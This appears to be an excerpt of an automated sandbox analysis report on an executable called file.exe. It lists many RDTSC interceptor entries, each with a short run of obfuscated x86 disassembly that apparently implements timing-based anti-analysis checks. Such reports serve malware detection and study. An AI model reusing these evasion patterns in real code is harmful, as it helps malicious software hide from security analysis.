                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE00F1 second address: FE0108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B9223Fh 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0108 second address: FE0117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F6C1537B646h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0234 second address: FE026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92241h 0x00000007 push ebx 0x00000008 jmp 00007F6C14B92247h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F6C14B92238h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE026C second address: FE0285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C1537B654h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C8A second address: FA8CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6C14B92236h 0x0000000f jmp 00007F6C14B9223Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0552 second address: FE0557 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0557 second address: FE055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0807 second address: FE0845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B655h 0x00000007 jmp 00007F6C1537B656h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F6C1537B646h 0x00000017 jg 00007F6C1537B646h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0DDC second address: FE0DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F6C14B92236h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6BF2 second address: FD6BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6BF6 second address: FD6C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92246h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C12 second address: FD6C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6C1537B659h 0x0000000e jmp 00007F6C1537B64Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C45 second address: FD6C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B9223Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C55 second address: FD6C5F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C1537B646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF9E0 second address: FAF9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF9E6 second address: FAF9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6C1537B64Ah 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF9FA second address: FAFA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE184D second address: FE185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C1537B646h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1DEF second address: FE1E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F6C14B9223Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE440B second address: FE443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B653h 0x00000009 jmp 00007F6C1537B657h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE443D second address: FE444F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F6C14B9223Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE444F second address: FE4455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1506 second address: FB150A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8ADF second address: FE8AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8FD6 second address: FE9041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F6C14B92246h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jg 00007F6C14B92249h 0x00000015 push esi 0x00000016 jmp 00007F6C14B92241h 0x0000001b pop esi 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F6C14B92246h 0x00000026 jmp 00007F6C14B92246h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA352 second address: FEA374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007F6C1537B657h 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA374 second address: FEA37A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA7F8 second address: FAA7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECCFC second address: FECD02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECE46 second address: FECE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6C1537B651h 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECE60 second address: FECE70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007F6C14B92236h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECFD4 second address: FECFDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECFDD second address: FECFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED424 second address: FED428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED428 second address: FED443 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C14B92236h 0x00000008 jmp 00007F6C14B92241h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED443 second address: FED449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF114D second address: FF1151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF16B0 second address: FF16B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF18F5 second address: FF18F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF18F9 second address: FF18FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF18FF second address: FF1904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF20DC second address: FF20E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF20E0 second address: FF20E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2B87 second address: FF2B96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2B96 second address: FF2BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub esi, dword ptr [ebp+122D2E9Ah] 0x0000000d push 00000000h 0x0000000f mov di, 9145h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F6C14B92238h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov si, cx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jnp 00007F6C14B92238h 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29C5 second address: FF29C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2BDE second address: FF2BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29C9 second address: FF29F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6C1537B650h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29F5 second address: FF2A07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2A07 second address: FF2A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2A0C second address: FF2A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3CB3 second address: FF3CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3CB7 second address: FF3CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F6C14B9223Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3CD7 second address: FF3CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56E1 second address: FF56E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56E7 second address: FF56EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56EB second address: FF5743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92246h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F6C14B92244h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push ecx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ecx 0x0000001a jmp 00007F6C14B92248h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5743 second address: FF5762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F6C1537B658h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF450B second address: FF450F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7E2A second address: FF7E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC391 second address: FFC395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC395 second address: FFC39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC39E second address: FFC3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C14B92236h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F6C14B9223Dh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+1246B6EBh], ebx 0x0000001c movzx ebx, bx 0x0000001f xchg eax, esi 0x00000020 jmp 00007F6C14B92241h 0x00000025 push eax 0x00000026 pushad 0x00000027 push ecx 0x00000028 jo 00007F6C14B92236h 0x0000002e pop ecx 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF326 second address: FFF32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000426 second address: 100042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10023B7 second address: 10023F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C1537B648h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F6C1537B657h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6C1537B654h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10023F2 second address: 1002457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F6C14B92238h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 xor dword ptr [ebp+122D30B1h], ecx 0x00000028 adc bx, 1B1Bh 0x0000002d push 00000000h 0x0000002f movsx ebx, dx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F6C14B92238h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push eax 0x0000004f js 00007F6C14B92249h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100543B second address: 100543F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE4FC second address: FFE50E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C14B92238h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE50E second address: FFE515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE515 second address: FFE51A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10025F7 second address: 10025FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10080BE second address: 100812D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6C14B9223Bh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F6C14B92238h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1F86h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F6C14B92238h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov edi, 2DFD7FCDh 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D1830h] 0x00000057 push eax 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b jng 00007F6C14B92236h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100357B second address: 100357F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005566 second address: 10055F4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D275Dh], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor ebx, dword ptr [ebp+122D2E86h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1F86h], edx 0x0000002e pushad 0x0000002f mov esi, dword ptr [ebp+12442B43h] 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp+122D06D5h] 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F6C14B92238h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov edi, dword ptr [ebp+122D2BC6h] 0x0000005c push FFFFFFFFh 0x0000005e mov edi, dword ptr [ebp+122D2B62h] 0x00000064 nop 0x00000065 jmp 00007F6C14B9223Eh 0x0000006a push eax 0x0000006b pushad 0x0000006c pushad 0x0000006d jp 00007F6C14B92236h 0x00000073 jmp 00007F6C14B9223Bh 0x00000078 popad 0x00000079 push ebx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100828F second address: 1008295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A468 second address: 100A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008295 second address: 100830B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c movzx ebx, si 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, 2A876E36h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jne 00007F6C1537B648h 0x00000028 mov eax, dword ptr [ebp+122D130Dh] 0x0000002e sbb bx, D9E8h 0x00000033 push FFFFFFFFh 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F6C1537B648h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f nop 0x00000050 pushad 0x00000051 push ebx 0x00000052 push eax 0x00000053 pop eax 0x00000054 pop ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10093CB second address: 10093D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A46C second address: 100A471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051C79 second address: 1051C7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051C7E second address: 1051CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jg 00007F6C14B9223Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jg 00007F6C14B92236h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jo 00007F6C14B92236h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051CA0 second address: 1051CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051CA4 second address: 1051CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C14B92244h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051E1F second address: 1051E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051E25 second address: 1051E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F6C14B9223Ch 0x00000012 rdtsc
